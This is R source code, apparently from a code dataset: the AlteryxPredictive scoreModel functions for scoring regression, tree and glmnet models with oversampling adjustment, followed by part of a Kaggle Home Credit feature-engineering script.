scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, computeStdErrors = TRUE, interval = "prediction", confLevel = 0.01*int.vals, type = "response")
scores <- scores[,-2]
if (log.y)
for (i in 1:3)
scores[,i] <- exp(scores[[i]])*mod.obj$smearing.adj
names(scores) <- paste(score.field, "_", c("fit", "lwr", "upr"), sep = "")
} else {
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "score")$score
if (log.y) {
if (is.null(mod.obj$smearing.adj)) {
AlteryxRDataX::AlteryxMessage("The target variable does not appear to have been natrual log transformed, no correction was applied.", iType = 2, iPriority = 3)
} else {
scores <- exp(scores)*mod.obj$smearing.adj
}
}
}
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxDTree <- function(mod.obj, new.data, score.field, os.value = NULL,
os.pct = NULL, ...) {
new.data <- matchLevels(new.data, mod.obj$xlevels)
# Classification trees
if (!is.null(mod.obj$yinfo)) {
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "prob")
if (class(mod.obj) == "rxDForest")
scores <- scores[, -(ncol(scores))]
if (!is.null(os.value)) {
if (ncol(scores) != 2) {
AlteryxRDataX::AlteryxMessage("Adjusting for the oversampling of the target is only valid for a binary categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
} else {
target.value <- os.value
target.loc <- 2
if (mod.obj$yinfo$levels[1] == target.value) {
target.loc = 1
}
pred.prob <- scores[[target.loc]]
num.target <- mod.obj$yinfo$counts[mod.obj$yinfo$levels == target.value]
num.total <- sum(mod.obj$yinfo$counts)
sample.pct <- 100*num.target / num.total
wr <- sample.pct/os.pct
wc <- (100 - sample.pct)/(100 - os.pct)
if (mod.obj$yinfo$levels[1] == target.value) {
apr <- ((1 - pred.prob)/wr)/((1 - pred.prob)/wr + pred.prob/wc)
scores <- data.frame(score1 = apr, score2 = 1 - apr)
} else {
adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
}
}
}
names(scores) <- paste(score.field, "_", mod.obj$yinfo$levels)
} else { # Regression trees
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, predVarNames = "score")$score
}
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxDForest <- scoreModel.rxDTree
#' @export
#' @rdname scoreModel
scoreModel.elnet <- function(mod.obj, new.data, score.field = "Score", ...) {
#The code in the score tool has already subsetted the columns of the original
#data to be scored, so there's no need to subset in that case.
#However, we need to perform the subsetting and column ordering in case of future tools
#that might use scoreModel. Unfortunately, glmnet isn't smart enough to order the columns
#correctly in the predict function if they're provided in the wrong order.
used_x_vars <- getXVars(mod.obj)
new.data <- df2NumericMatrix(
x = new.data,
filtering_message = "Non-numeric variables are among the predictors. They are now being removed.",
convertVectorToDataFrame = TRUE
)
if (!all(used_x_vars %in% colnames(new.data))) {
missing_x_vars <- used_x_vars[!(used_x_vars %in% colnames(new.data))]
if (length(missing_x_vars) == 1) {
AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variable ", missing_x_vars, ". Please make
sure you provide this variable and try again."))
} else {
AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variables ", missing_x_vars, ". Please make
sure you provide these variables and try again."))
}
}
used_data <- new.data[,used_x_vars]
requireNamespace('glmnet')
score <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred)
score <- as.data.frame(score)
names(score) <- score.field
return(score)
}
#' @export
#' @rdname scoreModel
scoreModel.lognet <- function(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...) {
used_x_vars <- getXVars(mod.obj)
new.data <- df2NumericMatrix(
x = new.data,
filtering_message = "Non-numeric variables are among the predictors. They are now being removed.",
convertVectorToDataFrame = TRUE
)
target.value <- os.value
y.levels <- getYlevels(mod.obj)
if (!all(used_x_vars %in% colnames(new.data))) {
missing_x_vars <- used_x_vars[!(used_x_vars %in% colnames(new.data))]
if (length(missing_x_vars) == 1) {
AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variable ", missing_x_vars, ". Please
make sure you provide this variable and try again."))
} else {
AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variables ", missing_x_vars, ". Please
make sure you provide these variables and try again."))
}
}
used_data <- new.data[,used_x_vars]
requireNamespace('glmnet')
if (!is.null(os.value)) {
if (length(y.levels) != 2) {
AlteryxMessage2("Adjusting for the oversampling of the target is only valid for a binary
categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
scores <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
#Note that the predict.glmnet documentation says that only the probability of the second class is produced
#So we need to take 1 - that result and set the first column to that
scores <- data.frame(cbind((1 - scores), scores))
} else {
sample.pct <- samplePct(mod.obj, os.value, new.data)
wr <- sample.pct/os.pct
wc <- (100 - sample.pct)/(100 - os.pct)
pred.prob <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
pred.prob <- as.data.frame(cbind((1 - pred.prob), pred.prob))
pred.prob <- pred.prob[ , (1:2)[y.levels == os.value]]
adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
if (y.levels[1] == target.value) {
scores <- data.frame(score1 = adj.prob, score2 = 1 - adj.prob)
} else {
scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
}
}
} else {
scores <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
scores <- data.frame(cbind((1 - scores), scores))
}
names(scores) <- paste(score.field, "_", y.levels, sep = "")
return(scores)
}
#' @export
#' @rdname scoreModel
scoreModel.cv.glmnet <- function(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...) {
if (inherits(mod.obj$glmnet.fit, 'lognet')) {
return(scoreModel.lognet(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...))
} else {
scoreModel.elnet(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...)
}
}
#Note: When doing this for logistic regression, I'll need to update to differentiate between
#elnet and lognet types. I can test whether mod.obj$glmnet.fit inherits elnet.
| /R/scoreModel.R | no_license | tmmorley/AlteryxPredictive | R | false | false | 13,829 | r | #' Score function
#'
#' @param mod.obj model object
#' @param new.data new data to score
#' @param score.field name given to the score field
#' @param ... additional arguments
#' @export
#' @author Ramnath Vaidyanathan, Dan Putler, Bridget Toomey
#' @rdname scoreModel
scoreModel <- function(mod.obj, new.data, score.field = "Score", ...) {
UseMethod('scoreModel')
}
#' @param os.value oversampling value
#' @param os.pct oversampling percent
#' @param pred.int whether to generate prediction intervals
#' @param int.vals interval values
#' @param log.y whether to report y on the log scale
#' @export
#' @rdname scoreModel
scoreModel.default <- function(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...){
target.value <- os.value
new.data <- matchLevels(new.data, getXlevels(mod.obj))
y.levels <- getYlevels(mod.obj, new.data)
if (class(mod.obj) == "earth" && is.null(mod.obj$glm.list)) {
stop.Alteryx2("Spline Models that did not use a GLM family cannot be scored")
}
if (is.null(y.levels)) {
if(inherits(mod.obj, c("nnet.formula", "rpart", "svm"))){
scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data)))
} else {
if (class(mod.obj)[1] == "gbm") {
scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data, type = "response", n.trees = mod.obj$best.trees)))
} else {
scores <- data.frame(score = as.vector(predict(mod.obj, newdata = new.data, type = "response")))
}
}
names(scores) <- score.field
} else {
if (!is.null(os.value)) {
if (length(y.levels) != 2) {
AlteryxRDataX::AlteryxMessage("Adjusting for the oversampling of the target is only valid for a binary categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
scores <- data.frame(predProb(mod.obj, newdata = new.data))
} else {
sample.pct <- samplePct(mod.obj, os.value, new.data)
wr <- sample.pct/os.pct
wc <- (100 - sample.pct)/(100 - os.pct)
pred.prob <- predProb(mod.obj, new.data)[ , (1:2)[y.levels == os.value]]
adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
if (y.levels[1] == target.value) {
scores <- data.frame(score1 = adj.prob, score2 = 1 - adj.prob)
} else {
scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
}
}
} else {
scores <- data.frame(predProb(mod.obj, new.data))
}
names(scores) <- paste(score.field, "_", y.levels, sep = "")
}
scores
}
#' @export
scoreModel.glm <- scoreModel.default
#' @export
scoreModel.svyglm <- scoreModel.default
#' @export
scoreModel.negbin <- scoreModel.default
#' @export
#' @rdname scoreModel
scoreModel.lm <- function(mod.obj, new.data, score.field = "Score",
pred.int = FALSE, int.vals = NULL, log.y = FALSE, ...) {
if (pred.int) {
score <- as.data.frame(predict(mod.obj, newdata = new.data, level = 0.01*int.vals, interval = "predict"))
if (log.y) {
score$fit <- exp(score$fit)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
score$lwr <- exp(score$lwr)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
score$upr <- exp(score$upr)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
}
scores <- eval(parse(text = paste("data.frame(",score.field, "_fit = score$fit, ", score.field, "_lwr = score$lwr, ", score.field, "_upr = score$upr)", sep = "")))
} else {
score <- predict(mod.obj, newdata = new.data)
if (log.y) {
# The condition below checks to see if there are predicted values that
# would imply machine infinity when expotentiated. If this is the case
# a warning is given, and the smearing estimator is not applied. NOTE:
# to make this code work nicely in non-Alteryx environments, the
# AlteryxRDataX::AlteryxMessage call would need to be replaced with a message call
if (max(score) > 709) {
AlteryxRDataX::AlteryxMessage("The target variable does not appear to have been natural log transformed, no correction was applied.", iType = 2, iPriority = 3)
} else {
score <- exp(score)*(sum(exp(mod.obj$residuals))/length(mod.obj$residuals))
}
}
scores <- eval(parse(text = paste("data.frame(", score.field, " = score)")))
}
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxLogit <- function(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...) {
new.data <- matchLevels(new.data, mod.obj$xlevels)
pred.prob <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "pred.prob")$pred.prob
if (!is.null(os.value)) {
target.value <- os.value
num.target <- mod.obj$yinfo$counts[mod.obj$yinfo$levels == target.value]
num.total <- sum(mod.obj$yinfo$counts)
sample.pct <- 100*num.target / num.total
wr <- sample.pct/os.pct
wc <- (100 - sample.pct)/(100 - os.pct)
if (mod.obj$yinfo$levels == target.value) {
apr <- ((1 - pred.prob)/wr)/((1 - pred.prob)/wr + pred.prob/wc)
scores <- data.frame(score1 = apr, score2 = 1 - apr)
} else {
adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
}
} else {
scores <- data.frame(score1 = 1 - pred.prob, score2 = pred.prob)
}
names(scores) <- eval(parse(text = paste('c("', score.field, '_', mod.obj$yinfo$levels[1], '", "', score.field, '_', mod.obj$yinfo$levels[2], '")', sep="")))
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxGlm <- function(mod.obj, new.data, score.field = "Score", ...) {
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "score")$score
names(scores) <- score.field
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxLinMod <- function(mod.obj, new.data, score.field = "Score", pred.int = FALSE, int.vals = NULL, log.y = FALSE, ...) {
if (pred.int) {
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, computeStdErrors = TRUE, interval = "prediction", confLevel = 0.01*int.vals, type = "response")
scores <- scores[,-2]
if (log.y)
for (i in 1:3)
scores[,i] <- exp(scores[[i]])*mod.obj$smearing.adj
names(scores) <- paste(score.field, "_", c("fit", "lwr", "upr"), sep = "")
} else {
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "response", predVarNames = "score")$score
if (log.y) {
if (is.null(mod.obj$smearing.adj)) {
AlteryxRDataX::AlteryxMessage("The target variable does not appear to have been natrual log transformed, no correction was applied.", iType = 2, iPriority = 3)
} else {
scores <- exp(scores)*mod.obj$smearing.adj
}
}
}
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxDTree <- function(mod.obj, new.data, score.field, os.value = NULL,
os.pct = NULL, ...) {
new.data <- matchLevels(new.data, mod.obj$xlevels)
# Classification trees
if (!is.null(mod.obj$yinfo)) {
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, type = "prob")
if (class(mod.obj) == "rxDForest")
scores <- scores[, -(ncol(scores))]
if (!is.null(os.value)) {
if (ncol(scores) != 2) {
AlteryxRDataX::AlteryxMessage("Adjusting for the oversampling of the target is only valid for a binary categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
} else {
target.value <- os.value
target.loc <- 2
if (mod.obj$yinfo$levels[1] == target.value) {
target.loc = 1
}
pred.prob <- scores[[target.loc]]
num.target <- mod.obj$yinfo$counts[mod.obj$yinfo$levels == target.value]
num.total <- sum(mod.obj$yinfo$counts)
sample.pct <- 100*num.target / num.total
wr <- sample.pct/os.pct
wc <- (100 - sample.pct)/(100 - os.pct)
if (mod.obj$yinfo$levels[1] == target.value) {
apr <- ((1 - pred.prob)/wr)/((1 - pred.prob)/wr + pred.prob/wc)
scores <- data.frame(score1 = apr, score2 = 1 - apr)
} else {
adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
}
}
}
names(scores) <- paste(score.field, "_", mod.obj$yinfo$levels)
} else { # Regression trees
scores <- RevoScaleR::rxPredict(mod.obj, data = new.data, predVarNames = "score")$score
}
scores
}
#' @export
#' @rdname scoreModel
scoreModel.rxDForest <- scoreModel.rxDTree
#' @export
#' @rdname scoreModel
scoreModel.elnet <- function(mod.obj, new.data, score.field = "Score", ...) {
#The code in the score tool has already subsetted the columns of the original
#data to be scored, so there's no need to subset in that case.
#However, we need to perform the subsetting and column ordering in case of future tools
#that might use scoreModel. Unfortunately, glmnet isn't smart enough to order the columns
#correctly in the predict function if they're provided in the wrong order.
used_x_vars <- getXVars(mod.obj)
new.data <- df2NumericMatrix(
x = new.data,
filtering_message = "Non-numeric variables are among the predictors. They are now being removed.",
convertVectorToDataFrame = TRUE
)
if (!all(used_x_vars %in% colnames(new.data))) {
missing_x_vars <- used_x_vars[!(used_x_vars %in% colnames(new.data))]
if (length(missing_x_vars) == 1) {
AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variable ", missing_x_vars, ". Please make
sure you provide this variable and try again."))
} else {
AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variables ", missing_x_vars, ". Please make
sure you provide these variables and try again."))
}
}
used_data <- new.data[,used_x_vars]
requireNamespace('glmnet')
score <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred)
score <- as.data.frame(score)
names(score) <- score.field
return(score)
}
#' @export
#' @rdname scoreModel
scoreModel.lognet <- function(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...) {
used_x_vars <- getXVars(mod.obj)
new.data <- df2NumericMatrix(
x = new.data,
filtering_message = "Non-numeric variables are among the predictors. They are now being removed.",
convertVectorToDataFrame = TRUE
)
target.value <- os.value
y.levels <- getYlevels(mod.obj)
if (!all(used_x_vars %in% colnames(new.data))) {
missing_x_vars <- used_x_vars[!(used_x_vars %in% colnames(new.data))]
if (length(missing_x_vars) == 1) {
AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variable ", missing_x_vars, ". Please
make sure you provide this variable and try again."))
} else {
AlteryxPredictive::stop.Alteryx2(paste0("The incoming data stream is missing
the variables ", missing_x_vars, ". Please
make sure you provide these variables and try again."))
}
}
used_data <- new.data[,used_x_vars]
requireNamespace('glmnet')
if (!is.null(os.value)) {
if (length(y.levels) != 2) {
AlteryxMessage2("Adjusting for the oversampling of the target is only valid for a binary
categorical variable, so the predicted probabilities will not be adjusted.", iType = 2, iPriority = 3)
scores <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
#Note that the predict.glmnet documentation says that only the probability of the second class is produced
#So we need to take 1 - that result and set the first column to that
scores <- data.frame(cbind((1 - scores), scores))
} else {
sample.pct <- samplePct(mod.obj, os.value, new.data)
wr <- sample.pct/os.pct
wc <- (100 - sample.pct)/(100 - os.pct)
pred.prob <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
pred.prob <- as.data.frame(cbind((1 - pred.prob), pred.prob))
pred.prob <- pred.prob[ , (1:2)[y.levels == os.value]]
adj.prob <- (pred.prob/wr)/(pred.prob/wr + (1 - pred.prob)/wc)
if (y.levels[1] == target.value) {
scores <- data.frame(score1 = adj.prob, score2 = 1 - adj.prob)
} else {
scores <- data.frame(score1 = 1 - adj.prob, score2 = adj.prob)
}
}
} else {
scores <- predict(object = mod.obj, newx = used_data, s = mod.obj$lambda_pred, type = 'response')
scores <- data.frame(cbind((1 - scores), scores))
}
names(scores) <- paste(score.field, "_", y.levels, sep = "")
return(scores)
}
#' @export
#' @rdname scoreModel
scoreModel.cv.glmnet <- function(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...) {
if (inherits(mod.obj$glmnet.fit, 'lognet')) {
return(scoreModel.lognet(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...))
} else {
scoreModel.elnet(mod.obj, new.data, score.field = "Score",
os.value = NULL, os.pct = NULL, ...)
}
}
#Note: When doing this for logistic regression, I'll need to update to differentiate between
#elnet and lognet types. I can test whether mod.obj$glmnet.fit inherits elnet.
|
library(magrittr)
library(lightgbm)
library(moments)
library(data.table)
library(recommenderlab)
library(tidyverse)
#---------------------------
cat("Loading data...\n")
data_dir = "C:\\Users\\Viacheslav_Pyrohov\\Desktop\\Kaggle_Homecredit competition"
tr <- read_csv(file.path(data_dir, "application_train.csv"))
te <- read_csv(file.path(data_dir, "application_test.csv"))
#---------------------------
cat("Preprocessing...\n")
fn <- funs(mean, sd, min, max, sum, n_distinct, .args = list(na.rm = TRUE))
time_coef = log(0.5)/(-24) #apply weight coefficient to historical data, coef = 0.5 weight for 24 month ago
#---------------------------
cat("Preprocessing bureau_balance.csv...\n")
bbalance <- read_csv(file.path(data_dir, "bureau_balance.csv"))
# IMPORTANT! This part has low gain at the moment - check showed that old algorythm gave sum gain of 0.03234, new - 0.0457
sum_bbalance <- bbalance %>%
#to improve: treat warnings
#to do: delete redundant variables
#to do: to make sure that new approach works validate against the same number of features!
filter(!STATUS %in% 'X') %>% #filter out STATUS == 'X' as this mean absense of data
mutate(STATUS = if_else(STATUS == 'C', -1, as.numeric(STATUS)), #treat 'C' = closed as -1 #this returns warning, but the result is OK and validated
STATUS_WEIGHTED = exp(time_coef*(MONTHS_BALANCE))*STATUS) %>%
group_by(SK_ID_BUREAU) %>%
mutate(START_STATUS = first(STATUS, MONTHS_BALANCE),
END_STATUS = last(STATUS, MONTHS_BALANCE)) %>%
summarise_all(fn)
rm(bbalance); gc()
# old approach
# sum_bbalance <- bbalance %>%
# mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
# group_by(SK_ID_BUREAU) %>%
# summarise_all(fn)
# rm(bbalance); gc()
#---------------------------
cat("Preprocessing bureau.csv...\n")
bureau <- read_csv(file.path(data_dir, "bureau.csv"))
bureau <- bureau %>% #to do: validate if this approach gives gain
mutate(CREDIT_ACTIVE_BOOL = if_else(CREDIT_ACTIVE == 'Active', 1, 0),
CREDIT_CLOSED_BOOL = if_else(CREDIT_ACTIVE == 'Closed', 1, 0),
CREDIT_SOLD_BOOL = if_else(CREDIT_ACTIVE %in% c('Sold','Bad debt'), 1, 0),
CREDIT_UNTYPICAL_CURRENCY = if_else(CREDIT_CURRENCY != 'currency 1', 1, 0)) %>% #old approach could be better - check
select(-c(CREDIT_ACTIVE, CREDIT_CURRENCY))
# table(sum_bureau_test$CREDIT_CURRENCY) #currently continue working on bureau data
sum_bureau <- bureau %>%
left_join(sum_bbalance, by = "SK_ID_BUREAU") %>%
select(-SK_ID_BUREAU) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
rm(bureau, sum_bbalance); gc()
#---------------------------
cat("Preprocessing credit_card_balance.csv...\n")
cc_balance <- read_csv(file.path(data_dir, "credit_card_balance.csv"))
sum_cc_balance <- cc_balance %>%
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_cc_balance <- cc_balance %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(cc_balance); gc()
#---------------------------
cat("Preprocessing installments_payments.csv...\n")
payments <- read_csv(file.path(data_dir, "installments_payments.csv"))
sum_payments <- payments %>%
select(-SK_ID_PREV) %>%
mutate(PAYMENT_PERC = AMT_PAYMENT / AMT_INSTALMENT,
PAYMENT_DIFF = AMT_INSTALMENT - AMT_PAYMENT,
DPD = DAYS_ENTRY_PAYMENT - DAYS_INSTALMENT,
DBD = DAYS_INSTALMENT - DAYS_ENTRY_PAYMENT,
DPD = ifelse(DPD > 0, DPD, 0),
DBD = ifelse(DBD > 0, DBD, 0)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_payments <- payments %>%
select(-SK_ID_CURR) %>%
mutate(PAYMENT_PERC = AMT_PAYMENT / AMT_INSTALMENT,
PAYMENT_DIFF = AMT_INSTALMENT - AMT_PAYMENT,
DPD = DAYS_ENTRY_PAYMENT - DAYS_INSTALMENT,
DBD = DAYS_INSTALMENT - DAYS_ENTRY_PAYMENT,
DPD = ifelse(DPD > 0, DPD, 0),
DBD = ifelse(DBD > 0, DBD, 0)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(payments); gc()
#---------------------------
cat("Preprocessing POS_CASH_balance.csv...\n")
pc_balance <- read_csv(file.path(data_dir, "POS_CASH_balance.csv"))
sum_pc_balance <- pc_balance %>%
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
agr_prev_pc_balance <- pc_balance %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
group_by(SK_ID_PREV) %>%
summarise_all(funs(mean(., na.rm = TRUE)))
rm(pc_balance); gc()
#---------------------------
cat("Preprocessing previous_application.csv...\n")
prev <- read_csv(file.path(data_dir, "previous_application.csv"))
sum_prev <- prev %>%
#left_join(agr_prev_cc_balance, by = "SK_ID_PREV") %>% #to do: check if gives gain
#left_join(agr_prev_payments, by = "SK_ID_PREV") %>% #to do: check if gives gain
#left_join(agr_prev_pc_balance, by = "SK_ID_PREV") %>% #to do: check if gives gain
select(-SK_ID_PREV) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
mutate(DAYS_FIRST_DRAWING = ifelse(DAYS_FIRST_DRAWING == 365243, NA, DAYS_FIRST_DRAWING),
DAYS_FIRST_DUE = ifelse(DAYS_FIRST_DUE == 365243, NA, DAYS_FIRST_DUE),
DAYS_LAST_DUE_1ST_VERSION = ifelse(DAYS_LAST_DUE_1ST_VERSION == 365243, NA, DAYS_LAST_DUE_1ST_VERSION),
DAYS_LAST_DUE = ifelse(DAYS_LAST_DUE == 365243, NA, DAYS_LAST_DUE),
DAYS_TERMINATION = ifelse(DAYS_TERMINATION == 365243, NA, DAYS_TERMINATION),
APP_CREDIT_PERC = AMT_APPLICATION / AMT_CREDIT) %>%
group_by(SK_ID_CURR) %>%
summarise_all(fn)
rm(prev, agr_prev_cc_balance, agr_prev_payments, agr_prev_pc_balance); gc()
tri <- 1:nrow(tr)
y <- tr$TARGET
tr_te <- tr %>%
select(-TARGET) %>%
bind_rows(te) %>%
left_join(sum_bureau, by = "SK_ID_CURR") %>%
left_join(sum_cc_balance, by = "SK_ID_CURR") %>%
left_join(sum_payments, by = "SK_ID_CURR") %>%
left_join(sum_pc_balance, by = "SK_ID_CURR") %>%
left_join(sum_prev, by = "SK_ID_CURR") %>%
select(-SK_ID_CURR) %>%
mutate_if(is.character, funs(factor(.) %>% as.integer)) %>%
mutate(na = apply(., 1, function(x) sum(is.na(x))),
DAYS_EMPLOYED = ifelse(DAYS_EMPLOYED == 365243, NA, DAYS_EMPLOYED),
DAYS_EMPLOYED_PERC = sqrt(DAYS_EMPLOYED / DAYS_BIRTH),
INCOME_CREDIT_PERC = AMT_INCOME_TOTAL / AMT_CREDIT,
INCOME_PER_PERSON = log1p(AMT_INCOME_TOTAL / CNT_FAM_MEMBERS),
ANNUITY_INCOME_PERC = sqrt(AMT_ANNUITY / (1 + AMT_INCOME_TOTAL)),
LOAN_INCOME_RATIO = AMT_CREDIT / AMT_INCOME_TOTAL,
ANNUITY_LENGTH = AMT_CREDIT / AMT_ANNUITY,
CHILDREN_RATIO = CNT_CHILDREN / CNT_FAM_MEMBERS,
CREDIT_TO_GOODS_RATIO = AMT_CREDIT / AMT_GOODS_PRICE,
INC_PER_CHLD = AMT_INCOME_TOTAL / (1 + CNT_CHILDREN),
SOURCES_PROD = EXT_SOURCE_1 * EXT_SOURCE_2 * EXT_SOURCE_3,
CAR_TO_BIRTH_RATIO = OWN_CAR_AGE / DAYS_BIRTH,
CAR_TO_EMPLOY_RATIO = OWN_CAR_AGE / DAYS_EMPLOYED,
PHONE_TO_BIRTH_RATIO = DAYS_LAST_PHONE_CHANGE / DAYS_BIRTH,
PHONE_TO_EMPLOY_RATIO = DAYS_LAST_PHONE_CHANGE / DAYS_EMPLOYED
# add features from corr check loop
#AMT_DRAWINGS_OTHER_CURRENT_mean + DAYS_LAST_DUE_mean, # new corr = 0.086, diff = 0.059 #inefficient = 3.64E-04 on real data
#DAYS_LAST_DUE_mean + AMT_DRAWINGS_OTHER_CURRENT_sd, # new corr = 0.0856, diff = 0.0586 #inefficient = 4E-04 on real data
#CNT_DRAWINGS_OTHER_CURRENT_mean + CNT_INSTALMENT_MATURE_CUM_mean, # new corr = -0.084, diff = 0.0555 #inefficient = 1.66E-04 on real data
#AMT_PAYMENT_CURRENT_mean + DAYS_LAST_DUE_mean, # new corr = 0.08, diff = 0.05385 #inefficient = 0.00036 on real data
#AMT_CREDIT_SUM_max + RATE_INTEREST_PRIMARY_sd, # new corr = 0.31, check this carefully #inefficient on real data
#AMT_ANNUITY_min.y + RATE_INTEREST_PRIVILEGED_sd, # new corr = 0.13, check this carefully #inefficient on real data
#RATE_INTEREST_PRIMARY_NA = if_else(is.na(RATE_INTEREST_PRIMARY_mean) | is.nan(RATE_INTEREST_PRIMARY_mean), 0, 1), #added by intuition #inefficient on real data
#RATE_INTEREST_PRIVILEGED_NA = if_else(is.na(RATE_INTEREST_PRIVILEGED_mean) | is.nan(RATE_INTEREST_PRIVILEGED_mean), 0, 1) #added by intuition #inefficient on real data
) %>%
select(-one_of(drop_cols))
docs <- str_subset(names(tr), "FLAG_DOC")
live <- str_subset(names(tr), "(?!NFLAG_)(?!FLAG_DOC)(?!_FLAG_)FLAG_")
inc_by_org <- tr_te %>%
group_by(ORGANIZATION_TYPE) %>%
summarise(m = median(AMT_INCOME_TOTAL)) %$%
setNames(as.list(m), ORGANIZATION_TYPE)
rm(tr, te, fn, sum_bureau, sum_cc_balance,
sum_payments, sum_pc_balance, sum_prev); gc()
tr_te %<>%
mutate(DOC_IND_KURT = apply(tr_te[, docs], 1, moments::kurtosis),
LIVE_IND_SUM = apply(tr_te[, live], 1, sum),
NEW_INC_BY_ORG = dplyr::recode(tr_te$ORGANIZATION_TYPE, !!!inc_by_org),
NEW_EXT_SOURCES_MEAN = apply(tr_te[, c("EXT_SOURCE_1", "EXT_SOURCE_2", "EXT_SOURCE_3")], 1, mean),
NEW_SCORES_STD = apply(tr_te[, c("EXT_SOURCE_1", "EXT_SOURCE_2", "EXT_SOURCE_3")], 1, sd))%>%
mutate_all(funs(ifelse(is.nan(.), NA, .))) %>%
mutate_all(funs(ifelse(is.infinite(.), NA, .))) %>%
data.matrix()
#---------------------------
cat("Save & load dataset...\n")
save(tr_te, file = paste0(data_dir, "//Calculation//input_bigmatrix_short.RData"), version = NULL)
save(tri, file = paste0(data_dir, "//Calculation//input_tri.RData"), version = NULL)
save(y, file = paste0(data_dir, "//Calculation//input_y.RData"), version = NULL)
#load(file = paste0(data_dir, "//Calculation//input_bigmatrix_short.RData"), .GlobalEnv)
#load(file = paste0(data_dir, "//Calculation//input_tri.RData"), .GlobalEnv)
#load(file = paste0(data_dir, "//Calculation//input_y.RData"), .GlobalEnv)
gc()
#---------------------------
cat("Create additional variables...\n")
tr_te = as.data.table(tr_te); gc()
#
# # create vars for NaN observations
# # CONCLUSION: NAs already treated by na feature which is enough predicative
# #col_num = ncol(tr_te)
# #for (i in 3:col_num) {
# # colname = names(tr_te)[i]
# # tr_te[is.na(eval(as.name(colname)))|is.nan(eval(as.name(colname)))|is.null(eval(as.name(colname)))|is.infinite(eval(as.name(colname))),
# # paste0(colname, '_nulls') := 1]
# # #tr_te[is.na(eval(as.name(paste0(colname, '_nulls')))), paste0(colname, '_nulls') := 0]
# #}
#
# # outliers marking
# outliers_remove = function(dt,col_from,col_to) {
# for (i in col_from:col_to) {
# colname = names(dt)[i]
